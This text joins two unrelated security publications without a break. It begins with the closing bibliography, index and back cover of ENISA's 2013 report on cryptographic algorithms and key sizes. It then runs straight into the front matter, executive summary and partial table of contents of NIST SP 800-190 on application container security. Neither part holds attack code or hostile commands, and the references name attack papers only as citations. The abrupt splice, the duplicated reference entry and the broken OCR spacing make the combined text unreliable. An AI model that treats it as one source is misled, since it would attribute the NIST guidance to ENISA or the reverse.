[280] Krzysztof Pietrzak. A tight bound for EMAC. In Michele Bugliesi, Bart Preneel, Vladimiro
Sassone, and Ingo Wegener, editors, ICALP (2) , volume 4052 of Lecture Notes in Computer
Science , pages 168–179. Springer, 2006.
[281] PKCS #1 v1.5. RSA cryptography standard. RSA Laboratories, 1993.
[282] PKCS #1 v2.1. RSA cryptography standard. RSA Laboratories, 2002.
[283] David Pointcheval and Jacques Stern. Security arguments for digital signatures and blind
signatures. J. Cryptology , 13(3):361–396, 2000.
[284] David Pointcheval and Serge Vaudenay. On provable security for digital signature algorithms.
Technical Report LIENS-96-17, 1996.
[285] John M. Pollard. Monte Carlo methods for index computation (mod p). Math. Comput. ,
32(143):918–924, 1978.
[286] Bart Preneel, editor. Advances in Cryptology - EUROCRYPT 2000, International Conference
on the Theory and Application of Cryptographic Techniques, Bruges, Belgium, May 14-18,
2000, Proceeding , volume 1807 of Lecture Notes in Computer Science . Springer, 2000.
Page: 86
Algorithms, Key Size and Parameters Report – 2013 Recommendations
[287] Bart Preneel and Paul C. van Oorschot. MDx-MAC and building fast MACs from hash
functions. In Don Coppersmith, editor, CRYPTO , volume 963 of Lecture Notes in Computer
Science , pages 1–14. Springer, 1995.
[288] Bart Preneel and Paul C. van Oorschot. On the security of iterated message authentication
codes. IEEE Transactions on Information Theory , 45(1):188–199, 1999.
[289] Gorden Proctor and Carlos Cid. On weak keys and forgery attacks against polynomial-based
MAC schemes. In Moriai [245]. To appear.
[290] Tal Rabin, editor. Advances in Cryptology - CRYPTO 2010, 30th Annual Cryptology Con-
ference, Santa Barbara, CA, USA, August 15-19, 2010. Proceedings , volume 6223 of Lecture
Notes in Computer Science . Springer, 2010.
[291] K. Raeburn. Advanced Encryption Standard (AES) Encryption for Kerberos 5. RFC 3962
(Proposed Standard), February 2005.
[292] K. Raeburn. Encryption and Checksum Specifications for Kerberos 5. RFC 3961 (Proposed
Standard), February 2005.
[293] Vincent Rijmen. Cryptanalysis and design of iterated block ciphers . PhD thesis, Katholieke
Universiteit Leuven, 1997.
[294] Thomas Ristenpart and Scott Yilek. When good randomness goes bad: Virtual machine reset
vulnerabilities and hedging deployed cryptography. In NDSS . The Internet Society, 2010.
[295] P. Rogaway. Problems with proposed IP cryptography. Available at http://www.cs.
ucdavis.edu/~rogaway/papers/draft-rogaway-ipsec-comments-00.txt , 61995.
[296] Phillip Rogaway. Efficient instantiations of tweakable blockciphers and refinements to modes
OCB and PMAC. In Pil Joong Lee, editor, ASIACRYPT , volume 3329 of Lecture Notes in
Computer Science , pages 16–31. Springer, 2004.
[297] Phillip Rogaway. Evaluation of some blockcipher modes of operation. Cryptography Research
and Evaluation Committees (CRYPTREC) for the Government of Japan, 2011.
[298] Phillip Rogaway. Free OCB licenses. http://www.cs.ucdavis.edu/~rogaway/ocb/
license.htm , 2013.
[299] Phillip Rogaway, Mihir Bellare, and John Black. OCB: A block-cipher mode of operation for
efficient authenticated encryption. ACM Trans. Inf. Syst. Secur. , 6(3):365–403, 2003.
[300] Phillip Rogaway and David Wagner. A critique of CCM. Cryptology ePrint Archive, Report
2003/070, 2003. http://eprint.iacr.org/ .
Page: 87
Algorithms, Key Size and Parameters Report – 2013 Recommendations
[301] Bimal K. Roy, editor. Advances in Cryptology - ASIACRYPT 2005, 11th International Con-
ference on the Theory and Application of Cryptology and Information Security, Chennai,
India, December 4-8, 2005, Proceedings , volume 3788 of Lecture Notes in Computer Science .
Springer, 2005.
[302] Bimal K. Roy and Willi Meier, editors. Fast Software Encryption, 11th International Work-
shop, FSE 2004, Delhi, India, February 5-7, 2004, Revised Papers , volume 3017 of Lecture
Notes in Computer Science . Springer, 2004.
[303] Markku-Juhani Olavi Saarinen. Cycling attacks on GCM, GHASH and other polynomial
MACs and hashes. In Anne Canteaut, editor, FSE, volume 7549 of Lecture Notes in Computer
Science , pages 216–225. Springer, 2012.
[304] Reihaneh Safavi-Naini and Ran Canetti, editors. Advances in Cryptology - CRYPTO 2012
- 32nd Annual Cryptology Conference, Santa Barbara, CA, USA, August 19-23, 2012. Pro-
ceedings , volume 7417 of Lecture Notes in Computer Science . Springer, 2012.
[305] J. Salowey, A. Choudhury, and D. McGrew. AES Galois Counter Mode (GCM) Cipher Suites
for TLS. RFC 5288 (Proposed Standard), August 2008.
[306] Somitra Kumar Sanadhya and Palash Sarkar. New collision attacks against up to 24-step
SHA-2. In Dipanwita Roy Chowdhury, Vincent Rijmen, and Abhijit Das, editors, IN-
DOCRYPT , volume 5365 of Lecture Notes in Computer Science , pages 91–103. Springer,
2008.
[307] Yu Sasaki. Meet-in-the-middle preimage attacks on AES hashing modes and an application
to Whirlpool. In Antoine Joux, editor, FSE, volume 6733 of Lecture Notes in Computer
Science , pages 378–396. Springer, 2011.
[308] Yu Sasaki and Kazumaro Aoki. Finding preimages in full MD5 faster than exhaustive search.
In Antoine Joux, editor, EUROCRYPT , volume 5479 of Lecture Notes in Computer Science ,
pages 134–152. Springer, 2009.
[309] Yu Sasaki, Lei Wang, Kazuo Ohta, and Noboru Kunihiro. Security of MD5 challenge and
response: Extension of APOP password recovery attack. In Tal Malkin, editor, CT-RSA ,
volume 4964 of Lecture Notes in Computer Science , pages 1–18. Springer, 2008.
[310] Takakazu Satoh and Kiyomichi Araki. Fermat quotients and the polynomial time discrete log
algorithm for anomalous elliptic curves. Commentarii Math. Univ. St. Pauli , 47:81–92, 1998.
[311] J. Schiller. Cryptographic Algorithms for Use in the Internet Key Exchange Version 2
(IKEv2). RFC 4307 (Proposed Standard), December 2005.
Page: 88
Algorithms, Key Size and Parameters Report – 2013 Recommendations
[312] Bruce Schneier. Description of a new variable-length key, 64-bit block cipher (Blowfish). In
Ross J. Anderson, editor, FSE, volume 809 of Lecture Notes in Computer Science , pages
191–204. Springer, 1993.
[313] Claus-Peter Schnorr. Efficient identification and signatures for smart cards. In Brassard [62],
pages 239–252.
[314] SEC 1. Elliptic curve cryptography – version 2.0. Standards for Efficient Cryptography
Group, 2009.
[315] SEC 2. Recommended elliptic curve domain parameters – version 2.0. Standards for Efficient
Cryptography Group, 2010.
[316] Igor A. Semaev. Evaluation of discrete logarithms in a group of p-torsion points of an elliptic
curve in characteristic p. Math. Comput. , 67(221):353–356, 1998.
[317] Pouyan Sepehrdad, Serge Vaudenay, and Martin Vuagnoux. Statistical attack on RC4 -
distinguishing WPA. In Paterson [272], pages 343–363.
[318] Pouyan Sepehrdad, Serge Vaudenay, and Martin Vuagnoux. Statistical attack on rc4 - dis-
tinguishing wpa. In Paterson [272], pages 343–363.
[319] Victor Shoup. A proposal for an ISO standard for public key encryption. Cryptology ePrint
Archive, Report 2001/112, 2001. http://eprint.iacr.org/ .
[320] Victor Shoup, editor. Advances in Cryptology - CRYPTO 2005: 25th Annual International
Cryptology Conference, Santa Barbara, California, USA, August 14-18, 2005, Proceedings ,
volume 3621 of Lecture Notes in Computer Science . Springer, 2005.
[321] Nigel P. Smart. The discrete logarithm problem on elliptic curves of trace one. J. Cryptology ,
12(3):193–196, 1999.
[322] Nigel P. Smart. Errors matter: Breaking rsa-based pin encryption with thirty ciphertext va-
lidity queries. In Josef Pieprzyk, editor, CT-RSA , volume 5985 of Lecture Notes in Computer
Science , pages 15–25. Springer, 2010.
[323] D. Stebila and J. Green. Elliptic Curve Algorithm Integration in the Secure Shell Transport
Layer. RFC 5656 (Proposed Standard), December 2009.
[324] Marc Stevens. New collision attacks on SHA-1 based on optimal joint local-collision analysis.
In Johansson and Nguyen [177], pages 245–261.
[325] Marc Stevens, Arjen K. Lenstra, and Benne de Weger. Chosen-prefix collisions for MD5
and colliding X.509 certificates for different identities. In Moni Naor, editor, EUROCRYPT ,
volume 4515 of Lecture Notes in Computer Science , pages 1–22. Springer, 2007.
Page: 89
Algorithms, Key Size and Parameters Report – 2013 Recommendations
[326] Marc Stevens, Arjen K. Lenstra, and Benne de Weger. Chosen-prefix collisions for MD5 and
applications. IJACT , 2(4):322–359, 2012.
[327] Marc Stevens, Alexander Sotirov, Jacob Appelbaum, Arjen K. Lenstra, David Molnar,
Dag Arne Osvik, and Benne de Weger. Short chosen-prefix collisions for MD5 and the creation
of a rogue CA certificate. In Halevi [140], pages 55–69.
[328] Erik Tews and Martin Beck. Practical attacks against wep and wpa. In David A. Basin,
Srdjan Capkun, and Wenke Lee, editors, WISEC , pages 79–86. ACM, 2009.
[329] Erik Tews, Ralf-Philipp Weinmann, and Andrei Pyshkin. Breaking 104 bit WEP in less than
60 seconds. In Sehun Kim, Moti Yung, and Hyung-Woo Lee, editors, WISA , volume 4867 of
Lecture Notes in Computer Science , pages 188–202. Springer, 2007.
[330] Yosuke Todo, Yuki Ozawa, Toshihiro Ohigashi, and Masakatu Morii. Falsification attacks
against WPA-TKIP in a realistic environment. IEICE Transactions , 95-D(2):588–595, 2012.
[331] TTA.KO-12.0001/R1. Digital signature scheme with appendix – Part 2: Certificate-based
digital signature algorithm. Korean Telecommunications Technology Association, 2000.
[332] Kyushu University, NICT, and Fujitsu Laboratories. Achieve world record cryptanalysis
of next-generation cryptography. http://www.nict.go.jp/en/press/2012/06/PDF-att/
20120618en.pdf , 2012.
[333] Paul C. van Oorschot and Michael J. Wiener. Parallel collision search with cryptanalytic
applications. J. Cryptology , 12(1):1–28, 1999.
[334] Serge Vaudenay. On the weak keys of Blowfish. In Dieter Gollmann, editor, FSE, volume
1039 of Lecture Notes in Computer Science , pages 27–32. Springer, 1996.
[335] Serge Vaudenay. Security flaws induced by CBC padding - Applications to SSL, IPSEC,
WTLS ... In Knudsen [203], pages 534–546.
[336] Serge Vaudenay, editor. Advances in Cryptology - EUROCRYPT 2006, 25th Annual Interna-
tional Conference on the Theory and Applications of Cryptographic Techniques, St. Peters-
burg, Russia, May 28 - June 1, 2006, Proceedings , volume 4004 of Lecture Notes in Computer
Science . Springer, 2006.
[337] Serge Vaudenay and Martin Vuagnoux. Passive-only key recovery attacks on RC4. In Adams
et al. [6], pages 344–359.
[338] Serge Vaudenay and Amr M. Youssef, editors. Selected Areas in Cryptography, 8th Annual
International Workshop, SAC 2001 Toronto, Ontario, Canada, August 16-17, 2001, Revised
Papers , volume 2259 of Lecture Notes in Computer Science . Springer, 2001.
Page: 90
Algorithms, Key Size and Parameters Report – 2013 Recommendations
[339] David Wagner, editor. Advances in Cryptology - CRYPTO 2008, 28th Annual International
Cryptology Conference, Santa Barbara, CA, USA, August 17-21, 2008. Proceedings , volume
5157 of Lecture Notes in Computer Science . Springer, 2008.
[340] Xiaoyun Wang. New collision search for SHA-1. Presented at Rump Session of Crypto 2005,
2005.
[341] Xiaoyun Wang, Yiqun Lisa Yin, and Hongbo Yu. Finding collisions in the full SHA-1. In
Shoup [320], pages 17–36.
[342] Doug Whiting, Russ Housley, and Neils Ferguson. Submission to NIST: Counter with CBC-
MAC (CCM) – AES mode of operation. http://csrc.nist.gov/groups/ST/toolkit/BCM/
documents/ccm.pdf .
[343] Michael J. Wiener. Cryptanalysis of short RSA secret exponents. IEEE Transactions on
Information Theory , 36(3):553–558, 1990.
[344] Michael J. Wiener, editor. Advances in Cryptology - CRYPTO ’99, 19th Annual International
Cryptology Conference, Santa Barbara, California, USA, August 15-19, 1999, Proceedings ,
volume 1666 of Lecture Notes in Computer Science . Springer, 1999.
[345] Stephen C. Williams. Analysis of the SSH key exchange protocol. In Liqun Chen, editor,
IMA Int. Conf. , volume 7089 of Lecture Notes in Computer Science , pages 356–374. Springer,
2011.
[346] Arnold K. L. Yau, Kenneth G. Paterson, and Chris J. Mitchell. Padding oracle attacks on
CBC-mode encryption with secret and random IVs. In Henri Gilbert and Helena Handschuh,
editors, FSE, volume 3557 of Lecture Notes in Computer Science , pages 299–319. Springer,
2005.
[347] T. Ylonen and C. Lonvick. The Secure Shell (SSH) Authentication Protocol. RFC 4252
(Proposed Standard), January 2006.
[348] T. Ylonen and C. Lonvick. The Secure Shell (SSH) Protocol Architecture. RFC 4251 (Pro-
posed Standard), January 2006.
[349] T. Ylonen and C. Lonvick. The Secure Shell (SSH) Transport Layer Protocol. RFC 4253
(Proposed Standard), January 2006. Updated by RFC 6668.
[350] L. Zhu and B. Tung. Public Key Cryptography for Initial Authentication in Kerberos
(PKINIT). RFC 4556 (Proposed Standard), June 2006. Updated by RFC 6112.
Page: 91
Algorithms, Key Size and Parameters Report – 2013 Recommendations
Index
(EC)DSA, 38, 48, 49, 53
(EC)Schnorr, 12, 38, 49
3DES, 19, 21, 22, 58, 62
3GPP, 22
802.11i, 42
A5/1, 26, 27
A5/2, 26, 27
A5/3, 22
AES, 11, 14, 18, 19, 21, 24, 25, 32, 40, 53, 55,
58, 61, 62
authenticated encryption, 13, 41–43
BB, 38, 50
BEAST, 53
BF, 38, 49
block ciphers, 20–23
modes of operation, 35–39
Blowfish, 21, 23
Bluetooth, 60
Camellia, 15, 21, 22, 53, 55, 58
CBC mode, 11, 17, 35–37, 42, 53, 57, 58, 62
CBC-MAC, 39–40, 42, 43
AMAC, 36, 39, 40, 62
CMAC, 13, 14, 39, 40, 62
EMAC, 36, 39, 40
LMAC, 39
CCM mode, 17, 35, 36, 42, 43, 53, 55, 61
certificates, 45
CFB mode, 36, 37
CMAC, 17, 36
CRIME, 53CTR mode, 13, 14, 17, 25, 36, 37, 42, 43, 61
CWC mode, 17, 36, 43
Data Encapsulation Mechanism, seeDEM
Decision Diffie–Hellman problem, 29, 30
DEM, 13, 17, 25, 42, 46
DES, 15, 21, 23, 40, 58, 62
Diffie–Hellman problem, 29, 30, 47
discrete logarithm problem, seeDLP
DLP, 28–33
domain parameters, 45
DSA, 57
E0, 26, 27
EAX mode, 17, 35, 36, 43
ECB mode, 35, 36
ECDLP, 17, 28, 30–33
ECIES, 12, 13, 17, 46
ECIES-KEM, 13, 17, 38, 46, 47
elliptic curves, 19, 30–32, 62
pairings, 28, 31
EMAC, 17
EME mode, 36, 39
EMV, 34, 61
Encrypt-and-MAC, 36, 42
Encrypt-then-MAC, 13, 17, 36, 42, 44, 57
factoring, 28
gap Diffie–Hellman problem, 30, 47
GCM, 41
GCM mode, 17, 35, 36, 43, 53, 55
GDSA, 38, 48
Page: 92
Algorithms, Key Size and Parameters Report – 2013 Recommendations
GMAC, 41, 43, 55
GSM, 22, 59
hash functions, 23–25
HMAC, 17, 36, 37, 41, 45, 55, 58, 60
IAPM, 42
IBE, 49
ID-IND-CCA, 49
IKE, 55
IKE-KDF, 37, 45, 55
IND-CCA, 35–38, 42, 46
IND-CPA, 35, 37, 39, 41
IND-CVA, 35
INT-CTXT, 42, 58
IPsec, 11, 23, 43, 45, 54
ISO-9796
RSA DS1, 38, 48, 61
RSA DS2, 38, 48
RSA DS3, 38, 48
Kasumi, 21, 22, 60
KDF, 13, 17, 43–45, 47
KDSA, 38, 48
KEM, 13, 42, 46, 47, 50
Kerberos, 57, 58
Key Agreement, 51
Key Derivation Functions, seeKDF
Key Encapsulation Mechanism, seeKEM
key separation, 34
LTE, 21, 26, 51, 59
MAC, 13, 17, 20, 21, 42–44, 62
MAC-then-Encrypt, 36, 42, 53
MACs, 39–41
MD-5, 15, 23–25, 37, 41, 45, 55
message authentication codes, seeMAC
NIST-800-108-KDF, 17, 37, 44
NIST-800-56-KDF, 17, 37, 44NMAC, 41
OCB mode, 17, 36, 42
OFB mode, 36, 37
PCBC mode, 58
PRF, 41, 44, 45
primitive, 11
protocol, 11
PSEC-KEM, 38, 47
PV Signatures, 38, 49
quantum computers, 33
Rabbit, 25, 26
RC4, 26, 27, 53, 59
RDSA, 38, 48
RIPEMD-128, 23, 25
RIPEMD-160, 23, 24
RSA, 18, 19, 28–29, 33, 46–48, 52, 57, 61
RSA-FDH, 38, 48
RSA-KEM, 38, 47
RSA-OAEP, 12, 13, 38, 46
RSA-PKCS# 1
encryption, 38, 46, 52, 53
signatures, 38, 47, 53
RSA-PSS, 12, 13, 38, 47, 48
scheme, 11
SHA-1, 13, 15, 23, 24, 37, 41, 45, 46, 55
SHA-2, 13, 14, 17, 23, 24, 32, 37, 41, 45, 46, 55,
58, 60
SHA-3, 17, 23, 24, 41, 46
SK, 38, 50
SNOW 2.0, 26
SNOW 3G, 15, 26, 27, 60
SSH, 43, 54, 56–58
SSL, 46
Stream Ciphers, 25–27
TKIP, 59
Page: 93
Algorithms, Key Size and Parameters Report – 2013 Recommendations
TLS, 11, 31, 43, 46, 51–54
TLS-KDF, 37, 45, 53
Triple DES, see(DES)19
Trivium, 26
TrueCrypt, 38
UIA1, 22
UMAC, 36, 41
UMTS, 22, 26, 51, 59
WEP, 59
Whirlpool, 23, 24
WPA, 59
X9.63-KDF, 14, 17, 37, 44
XEX, 38
XTS mode, 36, 38
ZigBee, 61
Page: 94
 Algorithms, Key Sizes and Parameters Report – 2013 r ecommendations  
 
Page | 4 
 
PO Box 1309, 710  01 Heraklion, Greece  
info@enisa.europa.eu  
www.enisa.europa.eu  ENISA  
European Union Agency for Network  and Information Security  
Science and Technology Park of Crete (ITE)  
Vassilika Vouton, 700 13, Heraklion, Greece  
 
Athens Office  
ENISA, 1 Vasilissis Sofias  
Marousi 151 24 , Athens, Greece  
  NIST Special Publication 800 -190 
 
Application Container Security Guide  
 
 
Murugiah Souppaya  
John Morello  
Karen Scarfone  
 
 
This publication is available free of charge from:  
https://doi.org/10.6028/ NIST.SP.800- 190 
 
 
C  O  M  P  U  T  E  R      S  E  C  U  R  I  T  Y  
  
  
 NIST Special Publication 800 -190 
Application Container Security Guide  
 
 
Murugiah Souppaya  
Computer Security Division  
Information Technology Laboratory  
 
John Morello  
Twistlock  
Baton Rouge, Louisiana  
 
Karen Scarfone  
Scarfone Cybersecurity 
Clifton, Virginia  
 
 
This publication is available free of charge from:  
https://doi.org/10.6028/ NIST.SP.800- 190 
 
 
September 2017  
 
 
U.S. Department of Commerce  
Wilbur L. Ross, Jr. , Secretary  
 
National Institute of Standards and Technology  
Kent Rochford , Acting Under Secretary of Commerce for Standards and Technology and Acting Director  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
i 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 Authority  
This publication has been developed by NIST in accordance with its statutory responsibilities under the 
Federal Information Security M odernization Act (FISMA) of 2014, 44 U.S.C. § 3551 et seq. , Public Law  
(P.L.) 113 -283. NIST is responsible for developing information security standards and guidelines, 
including minimum requirements  for federal information systems, but such standards and guidelines shall 
not apply to national security systems without the e xpress approval of appropriate f ederal officials 
exercising policy authority over such systems. This guideline is consistent with the requirements of the 
Office of Management and Budget (OMB) Circular A -130.  
Nothing in this publication should be taken to contradict the standards and guidelines made mandatory 
and bi nding on f ederal agencies by the Secretary of Commerce under statutory  authority. Nor should 
these guidelines be interpreted as altering or superseding the existing authorities of the Secretary of 
Commerce, Dir ector of the OMB, or any other f ederal official.  This publication may be used by 
nongovernmental organizations on a  voluntary basis and is not subject to copyright in the United States. 
Attribution would, however, be appreciated by NIST.   
National Institute of Standards and Technology Special Publication 800-190  
Natl. Inst. Stand. Technol. Spec. Publ. 800- 190, 63 pages ( September 2017 ) 
CODEN: NSPUE2  
This publication is available free of charge from:  
https://doi.org/10.6028/ NIST.SP.800 -190 
Certain commercial entities, equipment, or materials may be identified in this document in order to describe an 
experimental procedure or concept adequately. Such identification is not intended to imply recommendation or 
endorsement by N IST, nor is it intended to imply that the entities, materials, or equipment are necessarily the best 
available for the purpose.  
There may be references in this publication to other publications currently under development by NIST in 
accordance with its as signed statutory responsibilities. The information in this publication, including concepts and 
methodologies, may be used by federal agencies even before the completion of such companion publications. Thus, 
until each publication is completed, current requirements, guideline s, and procedures, where they exist, remain 
operative. For planning and transition purposes, federal agencies may wish to closely follow the development of 
these new publications by NIST.   
Organizations are encouraged to review all draft publications during public comment periods and provide feedback 
to NIST. Many NIST cybersecurity publications , other than the ones noted above, are available at 
https://csrc.nist.gov/publications . 
Comments on this publication may be submitted to:  
National Institute of Standards and Technology  
Attn: Computer Security Division, Information Technology Laboratory  
100 Bureau Drive (Mail Stop 8930) Gaithersburg, MD 20899 -8930  
Email: 800-190comments@nist.gov  
   
All comments are subject to release under the Freedom of Information Act (FOIA).  
  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
ii 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 Reports on Computer  Systems Technology 
The Information Technology Laboratory (ITL) at the National Institute of Standards and 
Technology (NIST) promotes the U.S. economy and public welfare by providing technical 
leadership for the Nation’s measurement and standards infrastructure. ITL develops tests, test 
meth ods, reference data, proof of concept implementations, and technical analyses to advance 
the development and productive use of information technology. ITL’s responsibilities include the 
development of management, administrative, technical, and physical sta ndards and guidelines for 
the cost -effective security and privacy of other than national s ecurity -related information in 
federal information systems. The Special Publication 800- series reports on ITL’s research, 
guidelines, and outreach efforts in informat ion system security, and its collaborative activities 
with industry, government, and academic organizations.  
 
Abstract  
Application container technologies, also known as containers, are a form of operating system 
virtualization combined with application sof tware packaging.  Containers provide a portable, 
reusable, and automatable way to package and run applications. This publication explains the 
potential security concerns associated with the use of containers and provides recommendations 
for addressing these  concerns.  
 
Keywords  
application; application container; application software packaging; container; container security; 
isolation; operating system virtualization; virtualization  
  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
iii 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 Acknowledgements  
The authors  wish to thank their colleagues  who have reviewed drafts of this document and 
contributed to its technical content  during its development , in particular Raghuram Yeluri from 
Intel Corporation, Paul Cichonski from Cisco Systems, Inc. , Michael Bartock and Jeffrey 
Cichonski from NIST , and Edward Sie wick . The authors also acknowledge the organizations that  
provided feedback during the public comment period, including Docker, Motorola Solutions, 
StackRox, United States Citizenship and Immigration Services (USCIS), and the US Army.  
 
Audience  
The intende d audience for this document is system and security administrators, security program 
managers, information system security officers, application developers, and others who have 
responsibilities for or are otherwise interested in the security of application  container 
technologies. 
This document assumes that readers have some operating system, networking, and security 
expertise, as well as expertise with virtualization technologies (hypervisors and virtual 
machines) . Because of the constantly changing nature of application container technologies, 
readers are encouraged to take advantage of other resources, including those listed in this 
document, for more current and detailed information.  
 
Trademark Information 
All registered trademarks or trademarks belong to their respective organizations.  
  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
iv 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 Executive Summary  
Operating system (OS) virtualization  provides a separate virtualized  view of the  OS to each 
application , thereby keep ing each application isolated from all others on the server. Each 
application can only see and affect itself.  Recently, OS  virtualization has become increasingly 
popular due to advances in its eas e of use and a  greater  focus on developer agility as a key 
benefit. Today’s OS  virtualization technologies are primarily focused on providing a portable, 
reusable, and automatable way to package and run applications (apps ). The  terms application 
container  or simply container  are frequently used to refer to these technologies.  
The purpose of the document  is to explain the security concerns associated with container 
technologies and make practical recommendations for addressing those concerns when planning 
for, implementing, and maintaining containers. Many of the recommendations are specific to a 
particular component or tier within the container technology architecture , which is depicted in 
Figure 1.  
Figure 1: Container Technology Architecture Tiers and Components  
Organizations should follow these recommendations to help ensure the security of their container 
technology implementations and usage:  
Tailor the organization’s operational culture and technical processes to support the new 
way of developing, running, and supporting applications made possible by container s. 
The introduction of container technologies might disrupt  the existing culture and software 
development methodologies within the organization. Traditional development practices, patching 
techniques , and system upgrade processes might not directly apply to a containerized 
environment , and it is important that employees are willing to ada pt to a new model. Staff should 
be encouraged to embrace the recommended  practices for securely building and operating apps 
within containers , as covered in this guide , and the organization should be willing to rethink 
existing procedures to take advantage  of containers. Education and training covering both the 
technology and the operational approach should be offered to anyone involved in the software 
development lifecycle.  
 

NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
v 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 Use container- specific host OSs instead of general -purpose ones  to reduce attack s urfaces.  
A container -specific host OS is a minimalist OS explicitly designed to only run containers , with 
all other services and functionality disabled, and with read -only file systems and other hardening 
practices employed . When using a container -specific host OS , attack surfaces are typically much 
smaller than  they would be with a general -purpose host OS , so there are fewer opportunities to 
attack and compromise a container -specific host OS . Accordingly, w henever possible, 
organizations should use container -specific host OSs to reduce their risk . However, it is 
important to note that container- specific host OSs will still have vulnerabilities over time that 
require remediation.  
Only group containers with the same purpose, sensitivity, and  threat posture on a single 
host OS kernel to allow for additional defense in depth.  
While most container platforms  do an effective job of isolating containers from each other and 
from the host OS , it may be an unnecessary risk to run apps of different sen sitivity levels 
together on the same host OS . Segmenting containers by purpose , sensitivity , and threat posture  
provides additional defense in depth.  By grouping containers in this manner, organizations make 
it more difficult for an attacker who  compromises one of the groups  to expand that compromise 
to other groups . This increases the likelihood that compromises will be detected and contained 
and also ensures that any residual data, such as caches or local volumes mounted for temp files, 
stays w ithin its security zone.  
In larger -scale environments with hundreds of hosts and thousands of containers, this grouping 
must be automated to be practical to operationalize. Fortunately, container technologies  typically 
include some notion of being able to group apps together, and container security tools can use 
attributes like container names and labels to enforce security policies across them.  
Adopt container -specific vulnerability management tools and processes for images  to 
prevent compromises.  
Traditio nal vulnerability management tools make many assumptions about host durability and 
app update mechanisms and frequencies that are fundamentally misaligned with a containerized 
model. For example, they often assume that a given server runs a consistent set of apps over 
time, but  different application  containers may actually be run on different servers at any given 
time based  on resource availability. Further, t raditional  tools are often unable to detect 
vulnerabilities within containers , leading to a false s ense of safety. Organizations should use 
tools that take the declarative, step -by-step build approach and immutable nature of containers 
and images into their design to provide more actionable and reliable results.  
These tools and processes should take bot h image software vulnerabilities and configuration 
settings into account. Organizations should adopt tools and processes to validate and enforce 
compliance with secure configuration best practices for images . This should include having 
centralized reportin g and monitoring of the compliance state of each image, and preventing non-
compliant images from being run.  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
vi 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 Consider u sing hardware -based countermeasures to provide a basis for trusted computing.  
Security should extend across all tiers of the container technology. The current way of 
accomplishing this is to base security on  a hardware root of trust, such as the industry standard 
Trusted Platform Module (TPM). Within th e hardware root of  trust are stored measurements of 
the host’s firmware, software, and configuration data. Validating the current measurements 
against the stored measurements before booting the host provides assurance that the host can be 
trusted. The chain of trust rooted in hardware can be extended to the OS kernel and the OS 
components to enable cryptographic verification of boot mechanisms, system images, container 
runtimes, and container images. Trusted computing provides a secure way to build, run, 
orchestrate, and manage containers.  
Use container- aware runtime defense tools.  
Deploy and use a dedicated container security solution capable of preventing, detecting, and 
responding to threats aimed at containers during runtime. Traditional security solutions, such as 
intrusion prevention s ystems (IPS s) and w eb application f irewalls (WAF s), often do not provide 
suitable protection for containers. They may not be able to operate at the scale of containers, 
manage the rate of change in a container environment, and have visibility into container activity. 
Utilize a container -native security solut ion that can monitor the container environment and 
provide precise detection of anomalous and malicious activity within it.  
 
  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
vii 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
  
Table of Contents 
Executive Summary  ..................................................................................................... iv 
1 Introduction ............................................................................................................ 1 
1.1 Purpose an d Scope  ........................................................................................ 1 
1.2 Document Structure  ........................................................................................ 1 
2 Introduction to Application Containers ................................................................ 3 
2.1 Basic Concepts for Application Virtualization and Containers  ......................... 3 
2.2 Containers and the Host Operating System  .................................................... 5 
2.3 Container Technology Architecture .................................................................  7 
2.3.1 Image Creation, Testing, and Accreditation  .......................................... 9 
2.3.2 Image Storage and Retrieval  ................................................................ 9 
2.3.3 Container Deployment and Management  ........................................... 10 
2.4 Container Uses  ............................................................................................. 11 
3 Major Risks for Core Components of Container Technologies ....................... 13 
3.1 Image Risks  .................................................................................................. 13 
3.1.1 Image vulnerabilities  ........................................................................... 13 
3.1.2 Image configuration defects  ............................................................... 13 
3.1.3 Embedded malware  ............................................................................ 14 
3.1.4 Embedded clear text secrets  .............................................................. 14 
3.1.5 Use of untrusted images  ..................................................................... 14 
3.2 Registry Risks ............................................................................................... 14 
3.2.1 Insecure connections to registries  ...................................................... 14 
3.2.2 Stale images in registries  ................................................................... 14 
3.2.3 Insufficient authenticat ion and authorization restrictions  .................... 14 
3.3 Orchestrator Risks  ........................................................................................ 15 
3.3.1 Unbounded administrative access  ...................................................... 15 
3.3.2 Unauthorized access  .......................................................................... 15 
3.3.3 Poorly separated inter -container network traffic  .................................  15 
3.3.4 Mixing of workload sensitivity levels  ................................................... 16 
3.3.5 Orchestrator node trust  ....................................................................... 16 
3.4 Container Risks  ............................................................................................ 16 
3.4.1 Vulnerabilities within the runtime software .......................................... 16 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
viii 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 3.4.2 Unbounded network access from containers  ...................................... 16 
3.4.3 Insecure container runtime configurations  .......................................... 17 
3.4.4 App vulnerabilities  .............................................................................. 17 
3.4.5 Rogue containers  ............................................................................... 17 
3.5 Host OS Risks  .............................................................................................. 17 
3.5.1 Large attack surface  ........................................................................... 17 
3.5.2 Shared kernel  ..................................................................................... 18 
3.5.3 Host OS component vulnerabilities  .................................................... 18 
3.5.4 Improper user access rights  ............................................................... 18 
3.5.5 Host OS file system tampering  ........................................................... 18 
4 Countermeasures for Major Risks  ...................................................................... 19 
4.1 Image Countermeasures  .............................................................................. 19 
4.1.1 Image vulnerabilities  ........................................................................... 19 
4.1.2 Image configuration defects  ............................................................... 19 
4.1.3 Embedded malware  ............................................................................ 20 
4.1.4 Embedded clear text secrets  .............................................................. 20 
4.1.5 Use of untrusted images  ..................................................................... 20 
4.2 Registry Countermeasures  ........................................................................... 21 
4.2.1 Insecure connections to registries  ...................................................... 21 
4.2.2 Stale images in registries  ................................................................... 21 
